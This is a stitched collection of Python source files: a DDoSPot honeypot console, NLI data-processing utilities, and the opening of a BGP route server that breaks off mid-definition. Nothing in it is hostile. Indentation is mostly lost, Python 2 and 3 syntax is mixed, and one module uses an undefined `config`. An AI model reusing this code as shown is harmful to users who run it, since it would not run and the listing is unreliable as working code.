neg_ratio_list=neg_ratio_list)
numFetch = 1000
start = time.time()
for loop in range(numFetch):
data_batch = myIter.next(loop)
print loop
    print 'total fetching time: %f s' % (time.time() - start)
if __name__ == '__main__':
testPeopleSegPrefetchingIter()
# test_MyDataBatch()
|
console.py
|
#!/usr/bin/env python3
import cmd
import configparser
import sys
import threading
try:
import colorama
except ImportError:
exit('Please install colorama for colorful console output: pip install colorama')
try:
import tabulate
except ImportError:
exit('Tabulate module is needed for interactive console: "pip install tabulate"')
import core.potloader as potloader
import core.utils as utils
import core.spf as spf
class DDoSPot(cmd.Cmd):
    # ExtensionsAt is a descriptor: the plugin list is produced when the "plugins"
    # attribute is accessed on an instance, which is why it is declared here as a
    # class attribute rather than created in __init__
plugins = spf.ExtensionsAt(potloader.PotLoader)
pots = []
pot_names = []
def __init__(self, version):
cmd.Cmd.__init__(self)
# DDoSPot "constructor" will always be called (both in interactive and non-interactive mode)
# it is thus safe to init colorama here
colorama.init(autoreset=True)
self._read_config()
self.prompt = colorama.Fore.GREEN + 'ddp > '
self.doc_header = 'Available commands (use help <command> for detailed help):'
self.intro = colorama.Fore.YELLOW + '''
___ ___ ___ ___ _
| \| \ ___/ __| _ \___| |_
| |) | |) / _ \__ \ _/ _ \ _|
|___/|___/\___/___/_| \___/\__|
v%s
''' % (version) + colorama.Style.RESET_ALL + '''
[+] List enabled honeypots using "list"
[+] Start honeypot(s) using "start <honeypot>" or "start all"
[+] Use "help" to list all available commands
'''
def cmdloop(self, intro=None):
# avoid exiting the shell with CTRL-C
# enter another cmdloop instance instead
try:
cmd.Cmd.cmdloop(self)
except KeyboardInterrupt:
self.intro = ' '
self.cmdloop()
def do_list(self, args):
'''
list
======
Print the list of the available honeypots and corresponding status (enabled/disabled).
'''
pot_table = []
for pot in self.pots:
status = 'ENABLED' if pot['enabled'] else 'DISABLED'
pot_table.append((
pot['name'],
pot['desc'],
pot['version'],
pot['author'],
status
))
print('\nAvailable honeypots:\n')
print((self._indent(tabulate.tabulate(pot_table, headers=('Name', 'Description', 'Version', 'Author', 'Status')))))
def do_start(self, args):
'''
start
======
Usage: start [<honeypot>]
Start honeypot specified as an argument.
If no arguments are specified, start all honeypots configured in global.conf configuration file.
'''
# filter out incorrectly specified pots first
if args != '' and args not in self.pot_names:
utils.print_err('Honeypot "%s" is not available! Please use one of the available honeypots.' % (args))
self.do_list(None)
return
for pot in self.pots:
if args == '' or args == pot['name']:
if pot['enabled']:
state = pot['plugin'].status()
if state == 'Starting' or state == 'Running':
utils.print_warn('Honeypot "%s" starting or already running, will not start again' % (pot['name']))
continue
else:
# only ask user if the pot name is explicitly specified!
if args != '':
should_enable = ''
while should_enable not in ('y', 'n'):
should_enable = input(colorama.Fore.YELLOW + 'Honeypot "%s" is currently disabled - do you want to enable it and start it? [y/n] ' % (args)).lower().strip()
# enable the honeypot if user wants so (write it to config also!)
if should_enable == 'y':
pot['enabled'] = True
self.conf.set('honeypots', args, 'True')
print(('Enabling "%s"...' % (args)))
self._write_config()
else:
return
# skip pot if no pot name has been specified and pot is disabled
else:
continue
pot['plugin'].setup()
pot['thread'] = threading.Thread(target=pot['plugin'].run)
pot['thread'].start()
def do_stop(self, args):
'''
stop
======
Usage: stop [<honeypot>]
Stop honeypot specified as an argument.
If no arguments are specified, stop all currently running honeypots.
'''
        pot_found = (args == '')
for pot in self.pots:
if args == '' or args == pot['name']:
if pot['thread'] is None:
continue
pot_found = True
pot['plugin'].shutdown()
pot['thread'].join()
pot['thread'] = None
if not pot_found:
utils.print_err('Honeypot "%s" is not available or not started!' % (args))
return
def do_status(self, args):
'''
status
======
Usage: status <honeypot>
Print running status of the specified honeypot and gather statistics.
If no honeypot is specified, list short status of all currently running honeypots.
'''
status_table = []
for pot in self.pots:
if pot['thread'] is None:
continue
# long status for specific honeypot
# pot status function returns a dict and it must be placed in a list because of tabulate function
if args == pot['name']:
detailed_stats = pot['plugin'].status(short=False)
print(('\n%s status:\n' % (pot['name'])))
print((self._indent(tabulate.tabulate(self._flatten_stats(detailed_stats)))))
return
# if no honeypot has been specified, obtain short status
elif args == '':
status_table.append((pot['name'], pot['plugin'].status()))
if status_table:
print('\nHoneypot status:\n')
print((self._indent(tabulate.tabulate(status_table, headers=('Name', 'Status')))))
def do_exit(self, args):
'''Exit DDoSPot.'''
print('Exiting DDoSPot...')
self.do_stop('')
sys.exit(0)
def do_quit(self, args):
'''Exit DDoSPot.'''
self.do_exit(args)
def default(self, line):
        '''Overridden default method to show a custom error message when a command is not recognized.'''
utils.print_err('Unknown command: %s\n' % (line))
self.do_help(None)
def emptyline(self):
'''When empty line is entered in a prompt, simply do nothing - do not repeat the last command.'''
pass
def _flatten_stats(self, stats):
# iterating through list of lists containing various honeypot stats
# typical format is [['Stat description', val], ['Stat2 description', val2] ...]
# if any of the element within the inner list is a tuple, flatten it for tabulate module
# beware - function assumes stats always have the specified format:
# - list with two-element lists
# - first element is always non-iterable, second element can be a tuple
flatten_stats = []
for stat in stats:
if isinstance(stat[1], tuple):
flatten_stats.append([stat[0], ''])
flatten_stats.extend(['', e] for e in stat[1])
else:
flatten_stats.append(stat)
return flatten_stats
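    # Worked example for _flatten_stats (illustrative values, not real honeypot stats):
    #   [['Uptime', '2h'], ['Top sources', ('1.2.3.4', '5.6.7.8')]]
    # flattens to
    #   [['Uptime', '2h'], ['Top sources', ''], ['', '1.2.3.4'], ['', '5.6.7.8']]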
# see https://bitbucket.org/astanin/python-tabulate/pull-requests/14/indent-option
def _indent(self, txt, spaces=4):
indented = '\n'.join(' '*spaces + ln for ln in txt.splitlines())
return indented + '\n'
def _read_config(self):
try:
self.conf = configparser.RawConfigParser()
self.conf.read('global.conf')
honeypots = self.conf.items('honeypots')
# load all plugin modules here and store all info to pots dict
loaded_plugins = spf.load_plugins(names=[x[0] for x in honeypots])
for plugin in self.plugins:
pot = {}
name = plugin.name()
pot['name'] = name
pot['version'] = loaded_plugins[name].__version__
pot['desc'] = loaded_plugins[name].__desc__
pot['author'] = loaded_plugins[name].__author__
pot['plugin'] = plugin
pot['thread'] = None
pot['enabled'] = self.conf.getboolean('honeypots', name)
self.pots.append(pot)
self.pot_names.append(name)
# sort the pot list for convenience
self.pots = sorted(self.pots, key=lambda k: k['name'])
except configparser.Error as msg:
utils.print_err('Error occurred while parsing global configuration file: %s' % msg)
return
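    # A plausible minimal global.conf for _read_config/_write_config (hypothetical
    # honeypot names; the real section keys come from the core.spf plugin loader):
    #   [honeypots]
    #   dnspot = True
    #   ntppot = False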
    def _write_config(self):
        # configparser expects a text-mode file in Python 3, so open with 'w', not 'wb'
        with open('global.conf', 'w') as f:
            self.conf.write(f)
|
data_processing.py
|
# -*- coding: utf-8 -*-
import numpy as np
import re
import random
import json
import collections
from tqdm import tqdm
import nltk
from nltk.corpus import wordnet as wn
import os
import pickle
from nltk.tag import StanfordNERTagger
from nltk.tag import StanfordPOSTagger
from chainer import cuda
LABEL_MAP = {
"entailment": 0,
"neutral": 1,
"contradiction": 2,
"hidden": -1
}
PADDING = "<PAD>"
POS_Tagging = [PADDING, 'WP$', 'RBS', 'SYM', 'WRB', 'IN', 'VB', 'POS', 'TO', ':', '-RRB-', '$', 'MD', 'JJ', '#', 'CD', '``', 'JJR', 'NNP', "''", 'LS', 'VBP', 'VBD', 'FW', 'RBR', 'JJS', 'DT', 'VBG', 'RP', 'NNS', 'RB', 'PDT', 'PRP$', '.', 'XX', 'NNPS', 'UH', 'EX', 'NN', 'WDT', 'VBN', 'VBZ', 'CC', ',', '-LRB-', 'PRP', 'WP']
POS_dict = {pos:i for i, pos in enumerate(POS_Tagging)}
base_path = os.getcwd()
nltk_data_path = base_path + "/../TF/nltk_data"
nltk.data.path.append(nltk_data_path)
stemmer = nltk.SnowballStemmer('english')
tt = nltk.tokenize.treebank.TreebankWordTokenizer()
# use
def load_nli_data(path, genre=None, snli=False, shuffle = True):
"""
Load MultiNLI or SNLI data.
If the "snli" parameter is set to True, a genre label of snli will be assigned to the data.
"""
data = []
with open(path) as f:
for line in tqdm(f):
loaded_example = json.loads(line)
if loaded_example["gold_label"] not in LABEL_MAP:
continue
loaded_example["label"] = LABEL_MAP[loaded_example["gold_label"]]
if snli:
loaded_example["genre"] = "snli"
            if not genre or loaded_example["genre"] == genre:
data.append(loaded_example)
if shuffle:
random.seed(1)
random.shuffle(data)
return data
def is_exact_match(token1, token2):
token1 = token1.lower()
token2 = token2.lower()
token1_stem = stemmer.stem(token1)
if token1 == token2:
return True
for synsets in wn.synsets(token2):
for lemma in synsets.lemma_names():
if token1_stem == stemmer.stem(lemma):
return True
if token1 == "n't" and token2 == "not":
return True
elif token1 == "not" and token2 == "n't":
return True
elif token1_stem == stemmer.stem(token2):
return True
return False
def is_antonyms(token1, token2):
token1 = token1.lower()
token2 = token2.lower()
token1_stem = stemmer.stem(token1)
antonym_lists_for_token2 = []
for synsets in wn.synsets(token2):
for lemma_synsets in [wn.synsets(l) for l in synsets.lemma_names()]:
for lemma_syn in lemma_synsets:
for lemma in lemma_syn.lemmas():
for antonym in lemma.antonyms():
antonym_lists_for_token2.append(antonym.name())
# if token1_stem == stemmer.stem(antonym.name()):
# return True
antonym_lists_for_token2 = list(set(antonym_lists_for_token2))
for atnm in antonym_lists_for_token2:
if token1_stem == stemmer.stem(atnm):
return True
return False
def worker(shared_content, dataset):
def tokenize(string):
string = re.sub(r'\(|\)', '', string)
return string.split()
for example in tqdm(dataset):
s1_tokenize = tokenize(example['sentence1_binary_parse'])
s2_tokenize = tokenize(example['sentence2_binary_parse'])
s1_token_exact_match = [0] * len(s1_tokenize)
s2_token_exact_match = [0] * len(s2_tokenize)
s1_token_antonym = [0] * len(s1_tokenize)
s2_token_antonym = [0] * len(s2_tokenize)
for i, word in enumerate(s1_tokenize):
matched = False
for j, w2 in enumerate(s2_tokenize):
matched = is_exact_match(word, w2)
if matched:
s1_token_exact_match[i] = 1
s2_token_exact_match[j] = 1
content = {}
content['sentence1_token_exact_match_with_s2'] = s1_token_exact_match
content['sentence2_token_exact_match_with_s1'] = s2_token_exact_match
shared_content[example["pairID"]] = content
# print(shared_content[example["pairID"]])
# print(shared_content)
def load_shared_content(fh, shared_content):
for line in fh:
row = line.rstrip().split("\t")
key = row[0]
value = json.loads(row[1])
shared_content[key] = value
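# Each line of the shared content file is expected to be "<pairID>\t<JSON dict>",
# e.g. (hypothetical pairID and values):
#   63735n\t{"sentence1_token_exact_match_with_s2": [0, 1, 0], "sentence2_token_exact_match_with_s1": [1, 0]}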
def load_mnli_shared_content(config):
shared_file_exist = False
shared_path = config.data_path + "/shared.jsonl"
# shared_path = "../shared.json"
print(shared_path)
if os.path.isfile(shared_path):
shared_file_exist = True
# shared_content = {}
assert shared_file_exist
# if not shared_file_exist and config.use_exact_match_feature:
# with open(shared_path, 'w') as f:
# json.dump(dict(reconvert_shared_content), f)
# elif config.use_exact_match_feature:
with open(shared_path) as f:
shared_content = {}
load_shared_content(f, shared_content)
# shared_content = json.load(f)
return shared_content
def sentences_to_padded_index_sequences(datasets, config):
"""
Annotate datasets with feature vectors. Adding right-sided padding.
"""
# Extract vocabulary
def tokenize(string):
string = re.sub(r'\(|\)', '', string)
return string.split()
word_counter = collections.Counter()
char_counter = collections.Counter()
# mgr = multiprocessing.Manager()
# shared_content = mgr.dict()
# process_num = config.num_process_prepro
# process_num = 1
for i, dataset in enumerate(datasets):
# if not shared_file_exist:
# num_per_share = len(dataset) / process_num + 1
# jobs = [ multiprocessing.Process(target=worker, args=(shared_content, dataset[i * num_per_share : (i + 1) * num_per_share] )) for i in range(process_num)]
# for j in jobs:
# j.start()
# for j in jobs:
# j.join()
for example in tqdm(dataset):
s1_tokenize = tokenize(example['sentence1_binary_parse'])
s2_tokenize = tokenize(example['sentence2_binary_parse'])
word_counter.update(s1_tokenize)
word_counter.update(s2_tokenize)
for i, word in enumerate(s1_tokenize):
char_counter.update([c for c in word])
for word in s2_tokenize:
char_counter.update([c for c in word])
# shared_content = {k:v for k, v in shared_content.items()}
vocabulary = set([word for word in word_counter])
vocabulary = list(vocabulary)
if config.embedding_replacing_rare_word_with_UNK:
vocabulary = [PADDING, "<UNK>"] + vocabulary
else:
vocabulary = [PADDING] + vocabulary
# print(char_counter)
word_indices = dict(zip(vocabulary, range(len(vocabulary))))
indices_to_words = {v: k for k, v in word_indices.items()}
char_vocab = set([char for char in char_counter])
char_vocab = list(char_vocab)
char_vocab = [PADDING] + char_vocab
char_indices = dict(zip(char_vocab, range(len(char_vocab))))
indices_to_char = {v: k for k, v in char_indices.items()}
for i, dataset in enumerate(datasets):
for example in tqdm(dataset):
for sentence in ['sentence1_binary_parse', 'sentence2_binary_parse']:
example[sentence + '_index_sequence'] = np.zeros((config.seq_length), dtype=np.int32)
example[sentence + '_inverse_term_frequency'] = np.zeros((config.seq_length), dtype=np.float32)
token_sequence = tokenize(example[sentence])
padding = config.seq_length - len(token_sequence)
for i in range(config.seq_length):
if i >= len(token_sequence):
index = word_indices[PADDING]
itf = 0
else:
if config.embedding_replacing_rare_word_with_UNK:
index = word_indices[token_sequence[i]] if word_counter[token_sequence[i]] >= config.UNK_threshold else word_indices["<UNK>"]
else:
index = word_indices[token_sequence[i]]
itf = 1 / (word_counter[token_sequence[i]] + 1)
example[sentence + '_index_sequence'][i] = index
example[sentence + '_inverse_term_frequency'][i] = itf
example[sentence + '_char_index'] = np.zeros((config.seq_length, config.char_in_word_size), dtype=np.int32)
for i in range(config.seq_length):
if i >= len(token_sequence):
continue
else:
chars = [c for c in token_sequence[i]]
for j in range(config.char_in_word_size):
if j >= (len(chars)):
break
else:
index = char_indices[chars[j]]
example[sentence + '_char_index'][i,j] = index
return indices_to_words, word_indices, char_indices, indices_to_char
def get_subword_list(token):
token = token.lower()
token = "<" + token + ">"
subword_list = []
for i in [3,4,5,6]:
for j in range(len(token) - i + 1):
subword_list.append(token[j : j + i])
return subword_list
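# Worked example: get_subword_list("cat") wraps the token as "<cat>" and collects
# all character n-grams of length 3 to 6:
#   ['<ca', 'cat', 'at>', '<cat', 'cat>', '<cat>']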
def load_subword_list(sentences, rand = False):
list_of_vectors = []
for sentence in sentences:
sentence_vector = []
for i in range(config.seq_length):
if i < len(sentence):
                idx = list(range(len(sentence[i])))  # list() so it can be shuffled under Python 3
if rand:
random.shuffle(idx)
token_subword_feature_list = [sentence[i][index] for index in idx][:config.subword_feature_len]
if len(token_subword_feature_list) < config.subword_feature_len:
token_subword_feature_list += [0] * (config.subword_feature_len - len(token_subword_feature_list))
sentence_vector.append(token_subword_feature_list)
else:
sentence_vector.append([0] * config.subword_feature_len)
list_of_vectors.append(sentence_vector)
return np.array(list_of_vectors)
def parsing_parse(parse):
base_parse = [s.rstrip(" ").rstrip(")") for s in parse.split("(") if ")" in s]
pos = [pair.split(" ")[0] for pair in base_parse]
return pos
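# Worked example: parsing_parse("(ROOT (NP (DT The) (NN dog)))") keeps the token
# that follows each opening bracket whose fragment contains a closing bracket,
# yielding the POS tags ['DT', 'NN'].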
def parse_to_pos_vector(parse, left_padding_and_cropping_pair = (0,0)): # ONE HOT
pos = parsing_parse(parse)
pos_vector = [POS_dict.get(tag,0) for tag in pos]
left_padding, left_cropping = left_padding_and_cropping_pair
vector = np.zeros((config.seq_length,len(POS_Tagging)))
assert left_padding == 0 or left_cropping == 0
for i in range(config.seq_length):
if i < len(pos_vector):
vector[i + left_padding, pos_vector[i + left_cropping]] = 1
else:
break
return vector
def generate_pos_feature_tensor(parses, left_padding_and_cropping_pairs):
pos_vectors = []
for parse in parses:
pos = parsing_parse(parse)
pos_vector = [(idx, POS_dict.get(tag, 0)) for idx, tag in enumerate(pos)]
pos_vectors.append(pos_vector)
return construct_one_hot_feature_tensor(pos_vectors, left_padding_and_cropping_pairs, 2, column_size=len(POS_Tagging))
def generate_pos_feature_vector(parse, seq_length):
pos = parsing_parse(parse)
pos_vector = [(idx, POS_dict.get(tag, 0)) for idx, tag in enumerate(pos)]
return construct_one_hot_feature_vector(pos_vector, 2, seq_length, column_size=len(POS_Tagging))
def construct_one_hot_feature_vector(sequence, dim, seq_length, column_size=None, dtype=np.int32):
if dim == 1:
vec = np.zeros((seq_length), dtype=dtype)
for num in sequence:
if num < seq_length:
vec[num] = 1
return vec
elif dim == 2:
assert column_size
mtrx = np.zeros((seq_length, column_size), dtype=dtype)
for row, col in sequence:
if row < seq_length and col < column_size:
mtrx[row, col] = 1
return mtrx
else:
raise NotImplementedError
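# Worked example: construct_one_hot_feature_vector([(0, 2), (1, 0)], dim=2,
# seq_length=3, column_size=4) returns
#   [[0 0 1 0]
#    [1 0 0 0]
#    [0 0 0 0]]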
def generate_quora_pos_feature_tensor(parses, left_padding_and_cropping_pairs):
pos_vectors = []
for parse in parses:
pos = parse.split()
pos_vector = [(idx, POS_dict.get(tag, 0)) for idx, tag in enumerate(pos)]
pos_vectors.append(pos_vector)
return construct_one_hot_feature_tensor(pos_vectors, left_padding_and_cropping_pairs, 2, column_size=len(POS_Tagging))
def generate_crop_pad_pairs(sequences):
seq_len = config.seq_length
list_of_pairs = []
for sequence in sequences:
left_padding = 0
left_cropping = 0
if len(sequence) < seq_len:
left_padding = int(random.uniform(0,1) * (seq_len - len(sequence)))
elif len(sequence) > seq_len:
left_cropping = int(random.uniform(0,1) * (len(sequence) - seq_len))
list_of_pairs.append((left_padding, left_cropping))
return list_of_pairs
def fill_feature_vector_with_cropping_or_padding(sequences, left_padding_and_cropping_pairs, dim, column_size=None, dtype=np.int32):
if dim == 1:
list_of_vectors = []
for sequence, pad_crop_pair in zip(sequences, left_padding_and_cropping_pairs):
vec = np.zeros((config.seq_length))
left_padding, left_cropping = pad_crop_pair
for i in range(config.seq_length):
if i + left_padding < config.seq_length and i - left_cropping < len(sequence):
vec[i + left_padding] = sequence[i + left_cropping]
else:
break
list_of_vectors.append(vec)
return np.array(list_of_vectors, dtype=dtype)
elif dim == 2:
assert column_size
tensor_list = []
for sequence, pad_crop_pair in zip(sequences, left_padding_and_cropping_pairs):
left_padding, left_cropping = pad_crop_pair
mtrx = np.zeros((config.seq_length, column_size))
for row_idx in range(config.seq_length):
if row_idx + left_padding < config.seq_length and row_idx < len(sequence) + left_cropping:
for col_idx, content in enumerate(sequence[row_idx + left_cropping]):
mtrx[row_idx + left_padding, col_idx] = content
else:
break
tensor_list.append(mtrx)
return np.array(tensor_list, dtype=dtype)
else:
raise NotImplementedError
def construct_one_hot_feature_tensor(sequences, left_padding_and_cropping_pairs, dim, column_size=None, dtype=np.int32):
"""
sequences: [[(idx, val)... ()]...[]]
left_padding_and_cropping_pairs: [[(0,0)...] ... []]
"""
tensor_list = []
for sequence, pad_crop_pair in zip(sequences, left_padding_and_cropping_pairs):
left_padding, left_cropping = pad_crop_pair
if dim == 1:
vec = np.zeros((config.seq_length))
for num in sequence:
if num + left_padding - left_cropping < config.seq_length and num + left_padding - left_cropping >= 0:
vec[num + left_padding - left_cropping] = 1
tensor_list.append(vec)
elif dim == 2:
assert column_size
mtrx = np.zeros((config.seq_length, column_size))
for row, col in sequence:
if row + left_padding - left_cropping < config.seq_length and row + left_padding - left_cropping >= 0 and col < column_size:
mtrx[row + left_padding - left_cropping, col] = 1
tensor_list.append(mtrx)
else:
raise NotImplementedError
return np.array(tensor_list, dtype=dtype)
def generate_manual_sample_minibatch(s1_tokenize, s2_tokenize, word_indices, char_indices):
nst = StanfordNERTagger('/home/users/yichen.gong/Stanford/stanford-ner-2014-08-27/classifiers/english.muc.7class.distsim.crf.ser.gz', '//home/users/yichen.gong/Stanford/stanford-ner-2014-08-27/stanford-ner.jar',encoding='utf-8')
pst = StanfordPOSTagger('/home/users/yichen.gong/Stanford/stanford-postagger-2014-08-27/models/english-bidirectional-distsim.tagger', \
'/home/users/yichen.gong/Stanford/stanford-postagger-2014-08-27/stanford-postagger.jar')
premise_vectors = np.zeros((1, config.seq_length))
hypothesis_vectors = np.zeros((1, config.seq_length))
premise_char_vectors = np.zeros((1, config.seq_length, config.char_in_word_size))
hypothesis_char_vectors = np.zeros((1, config.seq_length, config.char_in_word_size))
premise_exact_match = np.zeros((1, config.seq_length))
hypothesis_exact_match = np.zeros((1, config.seq_length))
for idx, w1 in enumerate(s1_tokenize):
premise_vectors[0, idx] = word_indices.get(w1, 0)
for ci, c in enumerate(w1):
premise_char_vectors[0, idx, ci] = char_indices.get(c, 0)
for s2idx, w2 in enumerate(s2_tokenize):
if is_exact_match(w1, w2):
premise_exact_match[0, idx] = 1
hypothesis_exact_match[0, s2idx] = 1
for idx, w2 in enumerate(s2_tokenize):
hypothesis_vectors[0, idx] = word_indices.get(w2, 0)
for ci, c in enumerate(w2):
hypothesis_char_vectors[0, idx, ci] = char_indices.get(c, 0)
premise_pos_vectors = np.zeros((1, config.seq_length, len(POS_dict.keys())))
hypothesis_pos_vectors = np.zeros((1, config.seq_length, len(POS_dict.keys())))
s1_pos = pst.tag(s1_tokenize)
s2_pos = pst.tag(s2_tokenize)
for idx, pair in enumerate(s1_pos):
word, tag = pair
premise_pos_vectors[0, idx, POS_dict[tag]] = 1
for idx, pair in enumerate(s2_pos):
word, tag = pair
hypothesis_pos_vectors[0, idx, POS_dict[tag]] = 1
# s1_ner = nst.tag(s1_tokenize)
# s2_ner = nst.tag(s2_tokenize)
# not used
labels = np.zeros((1))
genres = np.zeros((1))
pairIDs = np.zeros((1))
premise_inverse_term_frequency = np.zeros((1, config.seq_length, 1), dtype=np.float32)
hypothesis_inverse_term_frequency = np.zeros((1, config.seq_length, 1), dtype=np.float32)
premise_antonym_feature = np.zeros((1, config.seq_length))
hypothesis_antonym_feature = np.zeros((1, config.seq_length))
premise_NER_feature = np.zeros((1, config.seq_length, 7))
hypothesis_NER_feature = np.zeros((1, config.seq_length, 7))
premise_exact_match = np.expand_dims(premise_exact_match, 2)
hypothesis_exact_match = np.expand_dims(hypothesis_exact_match, 2)
premise_antonym_feature = np.expand_dims(premise_antonym_feature, 2)
hypothesis_antonym_feature = np.expand_dims(hypothesis_antonym_feature, 2)
return premise_vectors, hypothesis_vectors, labels, genres, premise_pos_vectors, \
hypothesis_pos_vectors, pairIDs, premise_char_vectors, hypothesis_char_vectors, \
premise_exact_match, hypothesis_exact_match, premise_inverse_term_frequency, hypothesis_inverse_term_frequency, \
premise_antonym_feature, hypothesis_antonym_feature, premise_NER_feature, hypothesis_NER_feature
def loadEmbedding_zeros(path, word_indices):
"""
Load GloVe embeddings. Initializng OOV words to vector of zeros.
"""
emb = np.zeros((len(word_indices), config.word_emb_size), dtype='float32')
with open(path, 'r') as f:
for i, line in enumerate(f):
if config.word_emb_load_num != None:
if i >= config.word_emb_load_num:
break
s = line.split()
if s[0] in word_indices:
emb[word_indices[s[0]], :] = np.asarray(s[1:])
return emb
def loadEmbedding_fully_rand(path, word_indices, divident = 1.0):
n = len(word_indices)
m = config.word_emb_size
emb = np.empty((n, m), dtype=np.float32)
emb[:,:] = np.random.normal(size=(n,m)) / divident
# Explicitly assign embedding of <PAD> to be zeros.
emb[0, :] = np.zeros((1,m), dtype="float32")
return emb
def loadEmbedding_rand(path, word_indices, divident = 1.0): # TODO double embedding
"""
Load GloVe embeddings. Doing a random normal initialization for OOV words.
"""
j = 0
n = len(word_indices)
m = config.word_emb_size
emb = np.empty((n, m), dtype=np.float32)
emb[:,:] = np.random.normal(size=(n,m)) / divident
# Explicitly assign embedding of <PAD> to be zeros.
emb[0, :] = np.zeros((1,m), dtype="float32")
with open(path, 'r', encoding='utf-8') as f:
for i, line in enumerate(f):
if config.word_emb_load_num != None:
if i >= config.word_emb_load_num:
break
s = line.split()
if s[0] in word_indices:
try:
emb[word_indices[s[0]], :] = np.asarray(s[1:])
except ValueError:
print(s[0])
continue
return emb
def all_lemmas(token):
t = token.lower()
lemmas = []
for synsets in wn.synsets(t):
for lemma in synsets.lemma_names():
lemmas.append(lemma)
return list(set(lemmas))
def loadEmbedding_with_lemma(path, word_indices):
j = 0
n = len(word_indices)
m = config.word_emb_size
emb = np.empty((n, m), dtype=np.float32)
emb[:,:] = np.random.normal(size=(n,m))
# Explicitly assign embedding of <PAD> to be zeros.
emb[0, :] = np.zeros((1,m), dtype="float32")
records = np.zeros((n))
indices_to_words = [""] * n
for key, val in word_indices.items():
indices_to_words[val] = key
print("OOV words: {}".format(n - np.sum(records) - 1))
print("Loading embedding for first round")
with open(path, 'r') as f:
for i, line in tqdm(enumerate(f)):
if config.word_emb_load_num != None:
if i >= config.word_emb_load_num:
break
s = line.split()
if s[0] in word_indices:
try:
emb[word_indices[s[0]], :] = np.asarray(s[1:])
records[word_indices[s[0]]] = 1
except ValueError:
print(s[0])
continue
print("OOV words: {}".format(n - np.sum(records) - 1))
print("Building OOV lemma sets")
OOV_word_indices = {}
for i in range(n):
if records[i] == 0:
for lemma in all_lemmas(indices_to_words[i]):
                try:
                    OOV_word_indices[lemma].append(i)
                except KeyError:
                    OOV_word_indices[lemma] = [i]
print("Loading embedding for second round")
with open(path, 'r') as f:
for i, line in tqdm(enumerate(f)):
if config.word_emb_load_num != None:
if i >= config.word_emb_load_num:
break
s = line.split()
if s[0] in OOV_word_indices:
for idx in OOV_word_indices[s[0]]:
if records[idx] == 0:
try:
emb[idx, :] = np.asarray(s[1:])
records[idx] = 1
except ValueError:
print(s[0])
continue
print("OOV words: {}".format(n - np.sum(records) - 1))
return emb
def save_submission(path, ids, pred_ids):
assert(ids.shape[0] == pred_ids.shape[0])
reverse_label_map = {str(value): key for key, value in LABEL_MAP.items()}
f = open(path, 'w')
f.write("pairID,gold_label\n")
for i in range(ids.shape[0]):
        pred = pred_ids[i] if not config.force_multi_classes else pred_ids[i] // config.forced_num_multi_classes
f.write("{},{}\n".format(str(ids[i]), reverse_label_map[str(pred)]))
f.close()
|
route_server.py
|
#!/usr/bin/env python
# Author:
# Muhammad Shahbaz (muhammad.shahbaz@gatech.edu)
# Rudiger Birkner (Networked Systems Group ETH Zurich)
# Arpit Gupta (Princeton)
import argparse
from collections import namedtuple
import json
from multiprocessing.connection import Listener, Client
import os
import Queue
import sys
from threading import Thread, Lock
import time
import socket
import struct
np = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
if np not in sys.path:
sys.path.append(np)
import util.log
from server import server as Server
logger = util.log.getLogger('XRS')
Config = namedtuple('Config', 'ah_socket')
bgpListener = None
config = None
participantsLock = Lock()
participants = dict()
portip2participant = dict()
clientPoolLock = Lock()
clientActivePool = dict()
clientDeadPool = set()
count_lock = Lock()
def create_sig():
with open('sig', 'w+') as f:
pass
class PctrlClient(object):
def __init__(self, conn, addr):
self.conn = conn
self.addr = addr
self.run = True
self.id = None
self.peers_in = []
self.peers_out = []
def start(self):
logger.info('BGP PctrlClient started for client ip %s.', self.addr)
msg_buff = ''
while self.run:
try:
rv = self.conn.recv(4096)
except EOFError as ee:
break
if not rv:
break
logger.debug('PctrlClient: Trace: Got rv, original route: %s', rv)
msg_buff += rv
offset = 0
buff_len = len(msg_buff)
while buff_len - offset >= 2:
msg_len = ord(msg_buff[offset]) | ord(msg_buff[offset + 1]) << 8
if buff_len - offset < msg_len:
break
data = msg_buff[offset + 2: offset + msg_len]
if data == 'stop':
with count_lock:
bgpListener.stop_counts += 1
logger.info("stop_counts:%d" % bgpListener.stop_counts)
if bgpListener.stop_counts == bgpListener.as_num:
logger.info("last stop signal received, exiting...")
with open('result', 'w+') as f:
f.write('route_count:%d start_time:%0.6f end_time:%0.6f' % (bgpListener.route_id + 1, bgpListener.start_time, bgpListener.end_time))
bgpListener.run = False
self.run = False
break
else:
data = json.loads(data)
self.process_message(**data)
offset += msg_len
msg_buff = msg_buff[offset:]
self.conn.close()
# remove self
with clientPoolLock:
logger.debug('Trace: PctrlClient.start: clientActivePool before: %s', clientActivePool)
logger.debug('Trace: PctrlClient.start: clientDeadPool before: %s', clientDeadPool)
t = clientActivePool[self]
del clientActivePool[self]
clientDeadPool.add(t)
logger.debug('Trace: PctrlClient.start: clientActivePool after: %s', clientActivePool)
logger.debug('Trace: PctrlClient.start: clientDeadPool after: %s', clientDeadPool)
with participantsLock:
logger.debug('Trace: PctrlClient.start: portip2participant before: %s', portip2participant)
logger.debug('Trace: PctrlClient.start: participants before: %s', participants)
found = [k for k,v in portip2participant.items() if v == self.id]
for k in found:
del portip2participant[k]
found = [k for k,v in participants.items() if v == self]
for k in found:
del participants[k]
logger.debug('Trace: PctrlClient.start: portip2participant after: %s', portip2participant)
logger.debug('Trace: PctrlClient.start: participants after: %s', participants)
def process_message(self, msgType=None, **data):
if msgType == 'hello':
rv = self.process_hello_message(**data)
elif msgType == 'bgp':
rv = self.process_bgp_message(**data)
else:
logger.warn("Unrecognized or absent msgType: %s. Message ignored.", msgType)
rv = True
return rv
def process_hello_message(self, id=None, peers_in=None, peers_out=None, ports=None, **data):
if not (id is not None and isinstance(ports, list) and
isinstance(peers_in, list) and isinstance(peers_out, list)):
logger.warn("hello message from %s is missing something: id: %s, ports: %s, peers_in: %s, peers_out: %s. Closing connection.", self.addr, id, ports, peers_in, peers_out)
return False
self.id = id = int(id)
self.peers_in = set(peers_in)
self.peers_out = set(peers_out)
with participantsLock:
logger.debug('Trace: PctrlClient.hello: portip2participant before: %s', portip2participant)
logger.debug('Trace: PctrlClient.hello: participants before: %s', participants)
for port in ports:
portip2participant[port] = id
participants[id] = self
logger.debug('Trace: PctrlClient.hello: portip2participant after: %s', portip2participant)
logger.debug('Trace: PctrlClient.hello: participants after: %s', participants)
create_sig()
return True
def process_bgp_message(self, announcement = None, **data):
if announcement:
bgpListener.send(announcement)
return True
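    # Wire format between the route server and participant controllers: each message
    # is prefixed with a 2-byte little-endian length that counts the prefix itself,
    # i.e. len(msg) + 2; start() above parses the same framing byte by byte.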
def send(self, route):
